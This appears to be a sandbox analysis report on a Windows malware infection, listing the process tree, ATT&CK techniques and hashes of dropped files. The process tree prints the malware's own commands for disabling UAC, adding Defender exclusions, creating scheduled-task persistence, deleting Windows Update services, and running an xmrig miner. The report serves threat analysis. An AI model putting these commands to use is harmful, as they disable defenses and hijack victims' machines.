C:\Baldi\Baldi.exe
4⤵
PID:7076

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
5⤵
- Kills process with taskkill
PID:5732

C:\Baldi\DisableUAC.exe
C:\Baldi\DisableUAC.exe
4⤵
PID:4900

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8795.tmp\8796.bat C:\Baldi\DisableUAC.exe"
5⤵
PID:7160

C:\Windows\system32\reg.exe
reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
PID:5772

C:\Windows\system32\shutdown.exe
shutdown -r -t 1 -c "BALDI EVIL..."
6⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
2⤵
PID:1424

C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe
"C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe"
2⤵
PID:7164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
- Executes dropped EXE
PID:1840

C:\Users\Admin\AppData\Local\Temp\a\a02.exe
"C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Users\Admin\AppData\Local\Temp\a\ss49.exe
"C:\Users\Admin\AppData\Local\Temp\a\ss49.exe"
2⤵
PID:3012

C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
2⤵
PID:6056

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:4600

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 516 -s 380
2⤵
- Program crash
PID:6048

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6236

C:\Users\Admin\AppData\Local\Temp\4784.exe
C:\Users\Admin\AppData\Local\Temp\4784.exe
1⤵
PID:4728

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:6872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:768

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5232

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:5424

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:5796

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:5892

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:7152

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:6460

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:7148

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:6424

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:344

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:1812

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:5408

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:6328

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:6716

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:316

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:1776

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:5532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:5424

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
2⤵
PID:1852

C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
1⤵
PID:3976

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:516

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ade055 /state1:0x41c64e6d
1⤵
PID:2652

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:5696

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe
Filesize
1.3MB

MD5
ebf39794ba6132055e6114d47bc18941

SHA1
214dead1bd716c58709c39a8180551b737048785

SHA256
8af777d0f92cef2d9040a634527c3753669235589c23129f09855ad0ebe10c6f

SHA512
01e7521af569050acc473fd13c8dd9a781370bd7cefcbc7e953e66ab930f407e9791c9fdb2ab4f368579f16bebb7368bebd2a475351a42d9e2092da0835bffbb

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\ProgramData\GitLibedll\YKNH.exe
Filesize
396.8MB

MD5
8b104807830b4853955887b9103df2ba

SHA1
4949ace4622bd720dc125b2b4eb3be091dcdac9f

SHA256
b184808a5d188907ef671b064183e7a7b32b083cef66ccca080a223c027db532

SHA512
d9ff1fc933b1b5e35d2eeb7d0082027f72ab7d2d479ea81ba77c848a6629626f804c3f3b1efebfd9ec07262516a951d8c154386a3e425edab48c9887feda30fc

Download Submit
C:\ProgramData\h5gb4fg\g3f31sd.exe
Filesize
5.3MB

MD5
1df9cc75ddc886d7354b191b0208b22e

SHA1
3ea881cf716ee5fc227d6c1bc79e99f313f5a0d1

SHA256
ea5434fe00116084020ab9990dcdbaf166c6f97f45c3800942fc121714921309

SHA512
47cab3f6f9a2fd1447b776a8af97381fab9e4e8638d030acd516f787d7a5e8b9ca56192556e6b729c88f4d70e0551610cb91d6a638ce66e07c571f2902369853

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ga.exe.log
Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oceanzx.exe.log
Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Temp\4784.exe
Filesize
331KB

MD5
0e6d98cd1506380f558b444cbddc0d07

SHA1
588693195849c75389317980dd5f4ca179fc573c

SHA256
226f5d36ca380bc5ebfeec857ca3e381214f734cfb5da55ffe391ff2a46a1589

SHA512
14cfec423f609bb643d4b729461b38148e2aa8b1a426b8280a9d7a82d37dbd2be8f3a9eed0a9bbfee604ca5c37e29db6a6073a480bb333fd88d908236888e5be

Download Submit
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
Filesize
249KB

MD5
08240e71429b32855b418a4acf0e38ec

SHA1
b180ace2ea6815775d29785c985b576dc21b76b5

SHA256
a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

SHA512
69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\853465373171
Filesize
110KB

MD5
dc4002909d1ae983e07e64583491f65e

SHA1
48e31b43a0d7825cdf0f8f45ab983241268a19b2

SHA256
d6213570bf93ce4ef3526744a5726de29028d70cb2142956788844a4a065f7e3

SHA512
90281f6442a2ab48aa30e54256569914d4a61f9a143713a9be4a544258d7c6655c34766992fa743b3ff6f639fcb68124ec2f3d7150dc3914860e67dda7b35754

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x0434011.exe
Filesize
378KB

MD5
c6a1d99ce62e5b70f1eefc85375f6465

SHA1
2b01f50b7c27106109ee5b1058baa16117a489cc

SHA256
df5f24993a77e1123fd90d3e059ef77354841704f19cb239efd36786a367d196

SHA512
81c0a541a316a4e7d9a006690308bf678cb2a622f976235a47b14537e82ef05690520b1c27be4e1a2be5151b6a1862acd65a4754e5217177f0d0af9e242cda98

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x0434011.exe
Filesize
378KB

MD5
c6a1d99ce62e5b70f1eefc85375f6465

SHA1
2b01f50b7c27106109ee5b1058baa16117a489cc

SHA256
df5f24993a77e1123fd90d3e059ef77354841704f19cb239efd36786a367d196

SHA512
81c0a541a316a4e7d9a006690308bf678cb2a622f976235a47b14537e82ef05690520b1c27be4e1a2be5151b6a1862acd65a4754e5217177f0d0af9e242cda98

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x1316114.exe
Filesize
206KB

MD5
371ea3e9f9cf1fd093fc4dd99b607df5

SHA1
825d3a6a59aa04a2d29079465be2c3fe6deae3e2

SHA256
2c7f7c3b9870af871b1957cf43528d900007778b1dc4e9edeb0e59f028ae1648

SHA512
973cc789de5ebd7d959bab0db9597e54f52fd5fe147050f37c50124f8d014bd17a5957034e4ddbf71aa1a7d0ba88c1dc3e611d41eaefab0723f41f3e2ef69a82

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x1316114.exe
Filesize
206KB

MD5
371ea3e9f9cf1fd093fc4dd99b607df5

SHA1
825d3a6a59aa04a2d29079465be2c3fe6deae3e2

SHA256
2c7f7c3b9870af871b1957cf43528d900007778b1dc4e9edeb0e59f028ae1648

SHA512
973cc789de5ebd7d959bab0db9597e54f52fd5fe147050f37c50124f8d014bd17a5957034e4ddbf71aa1a7d0ba88c1dc3e611d41eaefab0723f41f3e2ef69a82

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f4995985.exe
Filesize
172KB

MD5
0ed308ba57ea372d7076920a69a0b04e

SHA1
5be72bf75cf8160bd1be299673acc6caa33d26b8

SHA256
989a981dff895e5115e467f9f09ce057f7422d65adb6ef83959a2e622408f381

SHA512
0d3a0d3aa9f2901737a166c7d7bb083249f3c489af6a9a6f6ba9e1cf01aa3a356a51f79e86074bee40a05fddbc4d65db5bd4700fd8144b251693a42a5e8ce628

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f4995985.exe
Filesize
172KB

MD5
0ed308ba57ea372d7076920a69a0b04e

SHA1
5be72bf75cf8160bd1be299673acc6caa33d26b8

SHA256
989a981dff895e5115e467f9f09ce057f7422d65adb6ef83959a2e622408f381

SHA512
0d3a0d3aa9f2901737a166c7d7bb083249f3c489af6a9a6f6ba9e1cf01aa3a356a51f79e86074bee40a05fddbc4d65db5bd4700fd8144b251693a42a5e8ce628

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y9586431.exe
Filesize
377KB

MD5
50fc2c39089c0cae8ffad06ea4b24bba

SHA1
af2b0c10cbb05acb358811265882480dbb2373e0

SHA256
c0d31e63f20e00107f9f0ff19d99dac0d4e0772867e14ec5e97d33c9e15d4ee5

SHA512
eacffd9e38dcf9b89aebdcd8344955bcda13d6522e43fa779208c065d7b25d853c4d17aa4f936920551dc1149aa9503d1a82f76025847cc94e19fa8a76cf10a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y9586431.exe
Filesize
377KB

MD5
50fc2c39089c0cae8ffad06ea4b24bba

SHA1
af2b0c10cbb05acb358811265882480dbb2373e0

SHA256
c0d31e63f20e00107f9f0ff19d99dac0d4e0772867e14ec5e97d33c9e15d4ee5

SHA512
eacffd9e38dcf9b89aebdcd8344955bcda13d6522e43fa779208c065d7b25d853c4d17aa4f936920551dc1149aa9503d1a82f76025847cc94e19fa8a76cf10a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8547919.exe
Filesize
206KB

MD5
871754230e4649e5f3dc49aabfbe6e51

SHA1
bcb8cbb86caf7192b06ba5c292ebe6cc465a0744

SHA256
246f70906d8cdad16680445acbebfb5312ce309d5f024a860ec13fa4dcc6e372

SHA512
f8212c6162eddd7488e4f927b4a2b6abe075a8a0f1fca240d389f0cf4d96ab17b96e583c848777e75ed8a896ecfb0ded0968f9472cac0345d0401ade4b757921

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8547919.exe
Filesize
206KB

MD5
871754230e4649e5f3dc49aabfbe6e51

SHA1
bcb8cbb86caf7192b06ba5c292ebe6cc465a0744

SHA256
246f70906d8cdad16680445acbebfb5312ce309d5f024a860ec13fa4dcc6e372

SHA512
f8212c6162eddd7488e4f927b4a2b6abe075a8a0f1fca240d389f0cf4d96ab17b96e583c848777e75ed8a896ecfb0ded0968f9472cac0345d0401ade4b757921

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k8132957.exe
Filesize
12KB

MD5
e4cf9cc396e3b7c7422b329739c63643

SHA1
dff5cf71119aa431ec4c24f0e4c8bc2127e699e4

SHA256
e17bf0373e7e243d8da1ca9dfc51aa5656a7e2bd509ff0ffbab16188b5af0e88

SHA512
30a827a7f12de67cc1654a8dc4aa3e84322b8b33e7166cd8fd657f28a20f7b5b0352faa98c390a2a51aff0955e433ed510e6fe8d8c2b80c31cd2113dd6832429

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k8132957.exe
Filesize
12KB

MD5
e4cf9cc396e3b7c7422b329739c63643

SHA1
dff5cf71119aa431ec4c24f0e4c8bc2127e699e4

SHA256
e17bf0373e7e243d8da1ca9dfc51aa5656a7e2bd509ff0ffbab16188b5af0e88

SHA512
30a827a7f12de67cc1654a8dc4aa3e84322b8b33e7166cd8fd657f28a20f7b5b0352faa98c390a2a51aff0955e433ed510e6fe8d8c2b80c31cd2113dd6832429

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\k8132957.exe
Filesize
12KB

MD5
e4cf9cc396e3b7c7422b329739c63643

SHA1
dff5cf71119aa431ec4c24f0e4c8bc2127e699e4

SHA256
e17bf0373e7e243d8da1ca9dfc51aa5656a7e2bd509ff0ffbab16188b5af0e88

SHA512
30a827a7f12de67cc1654a8dc4aa3e84322b8b33e7166cd8fd657f28a20f7b5b0352faa98c390a2a51aff0955e433ed510e6fe8d8c2b80c31cd2113dd6832429

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l8152026.exe
Filesize
172KB

MD5
51a152a6904f4dcb611d2cfbc0b7190c

SHA1
bba69badc769a70c136371478889468eeb8cd1a2

SHA256
d5076eae3f5228bae591366c309b277aa0dc9f125580e347656924d1fb206841

SHA512
f0d4b5abb865697830951f4368d88785fda13eb7532781206e80569fe52da8c74f774750caf6b1e5495c1052d82c923617dd367bced92d7800fdf9addb1bb261

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l8152026.exe
Filesize
172KB

MD5
51a152a6904f4dcb611d2cfbc0b7190c

SHA1
bba69badc769a70c136371478889468eeb8cd1a2

SHA256
d5076eae3f5228bae591366c309b277aa0dc9f125580e347656924d1fb206841

SHA512
f0d4b5abb865697830951f4368d88785fda13eb7532781206e80569fe52da8c74f774750caf6b1e5495c1052d82c923617dd367bced92d7800fdf9addb1bb261

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l8152026.exe
Filesize
172KB

MD5
51a152a6904f4dcb611d2cfbc0b7190c

SHA1
bba69badc769a70c136371478889468eeb8cd1a2

SHA256
d5076eae3f5228bae591366c309b277aa0dc9f125580e347656924d1fb206841

SHA512
f0d4b5abb865697830951f4368d88785fda13eb7532781206e80569fe52da8c74f774750caf6b1e5495c1052d82c923617dd367bced92d7800fdf9addb1bb261

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\e3977726.exe
Filesize
267KB

MD5
6fdb34f8222060cc02bfebc8822703eb

SHA1
3eb159f1c769b5e13fd51d5f75f167daaefd47bf

SHA256
53f49de3b83fb503f48f00c0eefcbf09150c0acf60c0a3d20b945053e8713fb8

SHA512
5b57f9ad014e546b167eb650dc5ede16529a9b87e2320493edcc8491e6775931de09fe9c600d12248c5c01c8e702e0b18c035067d9c99ad4920cfc0190e1b675

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\d2455459.exe
Filesize
218KB

MD5
2957ea35ad7cfc130648dfa93ffe52ce

SHA1
dfe938bbed12b734122af28e09827ff1aad691f9

SHA256
2c972c8723a8cb26fe85592777c30f04c96bf38386799f09c05c4ade92d3fc46

SHA512
1cfaa1cf901560b59fc2951a854afda017d197626b91395f5baa2a8107618b39fe1eddd8cf56a1a7696841b152533de852b2fff0621bcab543db2a5ff1e87840

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3fuz3mup.ten.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\2.exe
Filesize
331KB

MD5
0e6d98cd1506380f558b444cbddc0d07

SHA1
588693195849c75389317980dd5f4ca179fc573c

SHA256
226f5d36ca380bc5ebfeec857ca3e381214f734cfb5da55ffe391ff2a46a1589

SHA512
14cfec423f609bb643d4b729461b38148e2aa8b1a426b8280a9d7a82d37dbd2be8f3a9eed0a9bbfee604ca5c37e29db6a6073a480bb333fd88d908236888e5be

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\2.exe
Filesize
331KB

MD5
0e6d98cd1506380f558b444cbddc0d07

SHA1
588693195849c75389317980dd5f4ca179fc573c

SHA256
226f5d36ca380bc5ebfeec857ca3e381214f734cfb5da55ffe391ff2a46a1589

SHA512
14cfec423f609bb643d4b729461b38148e2aa8b1a426b8280a9d7a82d37dbd2be8f3a9eed0a9bbfee604ca5c37e29db6a6073a480bb333fd88d908236888e5be

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\DIV.exe
Filesize
916KB

MD5
3037a91071720c71bf5cc9456a6417d1

SHA1
4e316599f09201434b8235f1e1e30823c5ac5488

SHA256
7e2c9879e89b79edbda3e04321d02030f94543d6766fc4a4474df65537bbac75

SHA512
4075fdaf1aced34ccc615e2522580485d3a4003c3f6269525c9230f0d694120e6c649d110770cc5c7a348d5d9a6b65d202c5067977e68a7dbe47c2c7886abb1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\DIV.exe
Filesize
916KB

MD5
3037a91071720c71bf5cc9456a6417d1

SHA1
4e316599f09201434b8235f1e1e30823c5ac5488

SHA256
7e2c9879e89b79edbda3e04321d02030f94543d6766fc4a4474df65537bbac75

SHA512
4075fdaf1aced34ccc615e2522580485d3a4003c3f6269525c9230f0d694120e6c649d110770cc5c7a348d5d9a6b65d202c5067977e68a7dbe47c2c7886abb1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
Filesize
677KB

MD5
99e770cd68e71c4e1fff20ffbb325624

SHA1
dc459e5ba593dcd7da4df5835a15cc0ebea36198

SHA256
5460fc226b1d4fe8e3d5c11e4afcd3b4ee67ccc9725ac71d27d6e1a5ea36f1d2

SHA512
bf63723044d7f20041f32a1f83c7f7bf8e3d6adba39d9e4ec8d1a3aae0c8fc2963dd45f441d2a0b5ca569786547199e51a712f65904d5a12290281baf10381db

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Dollar.exe
Filesize
677KB

MD5
99e770cd68e71c4e1fff20ffbb325624

SHA1
dc459e5ba593dcd7da4df5835a15cc0ebea36198

SHA256
5460fc226b1d4fe8e3d5c11e4afcd3b4ee67ccc9725ac71d27d6e1a5ea36f1d2

SHA512
bf63723044d7f20041f32a1f83c7f7bf8e3d6adba39d9e4ec8d1a3aae0c8fc2963dd45f441d2a0b5ca569786547199e51a712f65904d5a12290281baf10381db

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\H2.exe
Filesize
571KB

MD5
83e968ea79da03bc0e20716cd99d5fcb

SHA1
43234878888b72b4d6e9b7704f5c7715edff72c2

SHA256
6ca06d119da53e4bcd4752e62971541d0d4d2cfc86bad01b9ba8253c3d2615d3

SHA512
0f27f08b933fe2566bbfcc5b99bf748948a35d8e977aa9bb75a45201fec7e1e005462e3b454725142f902906999247634cff533c43002507817f6e7c9fa93162

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\H2.exe
Filesize
571KB

MD5
83e968ea79da03bc0e20716cd99d5fcb

SHA1
43234878888b72b4d6e9b7704f5c7715edff72c2

SHA256
6ca06d119da53e4bcd4752e62971541d0d4d2cfc86bad01b9ba8253c3d2615d3

SHA512
0f27f08b933fe2566bbfcc5b99bf748948a35d8e977aa9bb75a45201fec7e1e005462e3b454725142f902906999247634cff533c43002507817f6e7c9fa93162

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\M.exe
Filesize
154KB

MD5
cd7722e668bab8732008fc21cd5c54c8

SHA1
8975a70599cb30e8dbf6fd1e9494e2ff64773463

SHA256
e28909c004f094d21d333e507708ec6f5cd0cc78144b3f9ff01a053cbd443bea

SHA512
c14a6550cc68fe73b650c0772c567e84febeb3a7fc0c1d67a7f81bbd363e96ab3e16526557ab1d341af5e13c6de843945b1c4a33614a0dd9a38d4cd1021a0e7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\M.exe
Filesize
154KB

MD5
cd7722e668bab8732008fc21cd5c54c8

SHA1
8975a70599cb30e8dbf6fd1e9494e2ff64773463

SHA256
e28909c004f094d21d333e507708ec6f5cd0cc78144b3f9ff01a053cbd443bea

SHA512
c14a6550cc68fe73b650c0772c567e84febeb3a7fc0c1d67a7f81bbd363e96ab3e16526557ab1d341af5e13c6de843945b1c4a33614a0dd9a38d4cd1021a0e7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
Filesize
480KB

MD5
462948d717e44bda852450260ec44d37

SHA1
dc2aab0e06f483ee853ebec53cdb126131c0c8d7

SHA256
1d28cee9d618d8f15b3875ea1ac44a8bf4d9c59171da3227ba3b973e0c9fdb1a

SHA512
33620c953b59d5bb149ef24eb73d4c972629faa01abe3ed6027f00b6d06611c12866f6334d6c8224422a5e64e3a8ae102debaa403d48dc4ce1519c3250ad8e21

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
Filesize
480KB

MD5
462948d717e44bda852450260ec44d37

SHA1
dc2aab0e06f483ee853ebec53cdb126131c0c8d7

SHA256
1d28cee9d618d8f15b3875ea1ac44a8bf4d9c59171da3227ba3b973e0c9fdb1a

SHA512
33620c953b59d5bb149ef24eb73d4c972629faa01abe3ed6027f00b6d06611c12866f6334d6c8224422a5e64e3a8ae102debaa403d48dc4ce1519c3250ad8e21

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\R.exe
Filesize
498KB

MD5
94ef56eafe91890e18f8afe8ed95ded9

SHA1
3079d3fb5a8694e2def899c4cf668ed6e3bf6b35

SHA256
b10f4e89c274f555831b579741eee78466267b2e29ac96aece5c823cc0a4a961

SHA512
443bbef75759008580b64d43a337f5254303388ca0334151398eaf1c91388290adbdb4de42a13eb00a4edf99ef19f4cf79144ae6209ee91b190887d30805acd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\R.exe
Filesize
498KB

MD5
94ef56eafe91890e18f8afe8ed95ded9

SHA1
3079d3fb5a8694e2def899c4cf668ed6e3bf6b35

SHA256
b10f4e89c274f555831b579741eee78466267b2e29ac96aece5c823cc0a4a961

SHA512
443bbef75759008580b64d43a337f5254303388ca0334151398eaf1c91388290adbdb4de42a13eb00a4edf99ef19f4cf79144ae6209ee91b190887d30805acd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
Filesize
112KB

MD5
23d5e4451d06e75a3096a65250bad00b

SHA1
aed599efd69fdb9985c0e60558514e6c451fe329

SHA256
a3551ac295e91fd27d9e8bdb341452bc2aca9a6f9235bd3c4de7e2acf8ea775e

SHA512
d4a41e7a3c2e62ab84af308092dd8a86121908bb87cf510b2b1d91e70726d80666eb26b9407c20c48260999be1c647cdb2bcf8abe9a204e6f1fa762c75bf669d

Download Submit
